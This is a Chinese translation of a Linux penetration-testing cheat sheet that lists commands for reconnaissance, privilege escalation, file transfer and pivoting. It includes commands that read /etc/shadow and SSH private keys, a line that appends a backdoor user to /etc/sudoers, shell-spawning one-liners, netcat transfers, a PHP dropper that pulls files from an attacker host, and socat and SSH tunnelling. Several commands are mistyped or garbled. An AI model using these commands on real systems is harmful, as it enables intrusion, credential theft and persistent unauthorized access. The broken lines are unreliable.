0x00 前言
本文是翻译文章:记录在渗透测试过程中,经常会使用的Linux命令。
原文地址:https://m0chan.github.io/2018/07/31/Linux-Notes-And-Cheatsheet.html
0x01 列举
1.1 基本命令
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
| whoami hostname uname -a cat /etc/password cat /etc/shadow groups ifconfig netstat -an ps aux | grep root uname -a env id cat /proc/version cat /etc/issue cat /etc/passwd cat /etc/group cat /etc/shadow cat /etc/hosts
|
1.2 侦察
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
| 秘密的扫毛系统开放的端口
nmap -sS INSERTIPADDRESS
nmap INSERTIPADDRESS -p-
nmap INSERTIPADDRESS -sV -sC -O -p 111,222,333
nmap INSERTIPADDRESS -sU
nc -u INSERTIPADDRESS 48772
|
1.3 UDP扫描
1
| ./udpprotocolscanner <ip>
|
1.4 FTP枚举
1
| nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS
|
1.5 启动Web服务器
1
| python -m SimpleHTTPServer 80
|
0x02 利用
libSSH身份验证绕过-CVE-2018-10933
1 2 3
| https://github.com/blacknbunny/libSSH-Authentication-Bypass
Use nc <ip> 22 to banner grab the SSH Service, if it's running vulnerable version of libSSH then you can bypass
|
0x03 特权提升
3.1 基本命令
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| cat /proc/version <- Check for kernel exploits ps auxww ps -ef lsof -i netstat -laputen arp -e route cat /sbin/ifconfig -a cat /etc/network/interfaces cat /etc/sysconfig/network cat /etc/resolv.conf cat /etc/sysconfig/network cat /etc/networks iptables -L hostname dnsdomainname cat /etc/issue cat /etc/*-release cat /proc/version uname -a rpm -q kernel dmesg | grep Linux ls /boot | grep vmlinuz- lsb_release -a
|
3.2 运行pspy64
1 2 3
| #https://github.com/DominicBreuker/pspy
Run in background and watch for any processes running
|
3.3 生成TTY
1 2 3 4 5 6 7 8 9 10 11 12 13
| #https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
python -c 'import pty; pty.spawn("/bin/sh")' echo os.system('/bin/bash') awk 'BEGIN {system("/bin/sh")}' find / -name blahblah 'exec /bin/awk 'BEGIN {system("/bin/sh")}' \; python: exit_code = os.system('/bin/sh') output = os.popen('/bin/sh').read() perl -e 'exec "/bin/sh";' perl: exec "/bin/sh"; ruby: exec "/bin/sh" lua: os.execute('/bin/sh') irb(main:001:0> exec "/bin/sh" Can also use socat
|
3.4 枚举脚本
1 2 3 4 5 6
| cd /EscalationServer/ chmod u+x linux_enum.sh chmod 700 linuxenum.py
./linux_enum.sh python linuxenum.py
|
3.5 将用户添加到Sudoers
1
| echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers
|
3.6 列出CronJobs
1 2 3 4 5 6 7 8 9 10 11 12
| crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root
|
3.7 检查SSH可读SSH密钥的持久性和提升
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key
|
3.8 启动脚本
1
| find / -perm -o+w -type f 2>/dev/null | grep -v '/proc\|/dev'
|
3.9 查找用户或组的可写文件
1 2 3
| find / perm /u=w -user `whoami` 2>/dev/null find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null find / -perm /u+w -user `whoami` 2>/dev/nul
|
3.10 查找用户或组的可写目录
1 2
| find / perm /u=w -type -d -user `whoami` 2>/dev/null find / -perm /u+w,g+w -d -user `whoami` 2>/dev/null
|
3.11 嗅探流量
1 2 3 4
| tcpdump -i eth0 <protocol> tcpdump -i any -s0 -w capture.pcap tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X
|
3.12 用户安装的软件(有时配置错误)
1 2 3 4 5 6 7
| /usr/local/ /usr/local/src /usr/local/bin /opt/ /home /var/ /usr/src/
|
0x04 exploit
4.1 获得权限
1
| /sbin/getcap -r / 2>/dev/null
|
4.2 获取SUID二进制文件
1
| find / -perm -u=s -type f 2>/dev/null
|
4.3 检查Sudo配置
0x05 文件传输
5.1 base64
1 2
| cat file.transfer | base64 -w 0 echo base64blob | base64 -d > file.transfer
|
5.2 curl
1
| curl http://webserver/file.txt > output.txt
|
5.3 wget
1
| wget http://webserver/file.txt > output.txt
|
5.4 FTP
1 2
| pip install pyftpdlib python -m pyftpdlib -p 21 -w
|
5.5 TFTP
1 2 3 4
| service atftpd start atftpd --daemon --port 69 /tftp /etc/init.d/atftpd restart auxiliary/server/tftp
|
5.6 NC Listeners
1 2
| nc -lvnp 443 < filetotransfer.txt nc <ip> 443 > filetransfer.txt
|
5.7 PHP File Transfers
1
| echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
|
5.8 SCP
1 2 3 4 5
| # Copy a file: scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext
# Copy a directory: scp -r /path/to/source/dir username@192.168.1.101:/path/to/destination
|
0x06 横向渗透
6.1 SSH本地端口转发
1
| ssh <user>@<target> -L 127.0.0.1:8888:<targetip>:<targetport>
|
6.2 SSH动态端口转发
1 2 3
| ssh -D <localport> user@host nano /etc/proxychains.conf 127.0.0.1 <localport>
|
6.3 索卡特港口前进
1
| ./socat tcp-listen:5000,reuseaddr,fork tcp:<target ip>:5001
|